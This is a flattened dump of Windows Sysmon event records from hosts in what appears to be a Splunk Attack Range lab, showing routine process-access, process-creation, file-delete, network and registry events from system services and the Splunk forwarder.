19:19:17.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095450Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:17.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095449Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:17.180{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FF966ED6FDB3C495DDBA97685B6AB72,SHA256=6F5EBC28E9A058BD66182B6A5D080A9C29456DF4CC5EECB6B497AB86EC6A6BAF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:17.106{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:17.106{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D26D987004B66FDC8510E66A438DCAE1,SHA256=E57B533DD5591422C1250A75149AA29CCFCA9DEFD8A0B549C1DEF93702FC5A88falsefalse - insufficient disk space 10341000x80000000000000001095454Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:18.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095453Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:18.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095452Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:18.187{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=909176DABADEEF3D2DE5B06718FF8D6E,SHA256=0E3BC724D98381C6B4BACB834FFCFFB83C5BA3368E09868ECCA8C8ABDE25F699,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:16.653{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49744-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.227{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.227{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D8E72483662DF8F62527298A6CF3AB,SHA256=4FDD28ED7A1BD932801D330A2FCD287766F66C950E077C96777408B2AF0107B0falsefalse - insufficient disk space 11241100x80000000000000001606977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.158{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.158{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=041A5577B0452234CA41A4E74BF69C3D,SHA256=9B4597F0DBB271B33C107A35463A82674FCC8EDE9CD717B3EA78F117069CF603falsefalse - insufficient disk space 10341000x80000000000000001095474Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.749{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095473Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095472Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095471Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095470Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095469Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095468Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095467Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.746{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095466Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095465Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095464Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.224{761B69BB-7AB7-6080-9F5F-00000000BA01}71565872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095463Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.202{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=186BEB4D1196EE7790CD63B3487D479D,SHA256=EC3CFD63D62DE6B133AC31D35BA7B63C14882DE02B8A5E6768579B18E95B52FC,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001606986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 12241200x80000000000000001606985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 12241200x80000000000000001606984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 534500x80000000000000001606983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.309{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exe 11241100x80000000000000001606982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.230{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.230{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F85BA4B05A245CF1CB1E9445F29B18,SHA256=7C0F95CEC408B1D31237AEB6BD3688D37DEA2EC60A39FD72835D7729560DA584falsefalse - insufficient disk space 10341000x80000000000000001095462Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.085{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095461Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095460Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095459Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095458Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.082{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095457Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.082{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095456Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.082{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095455Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.081{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 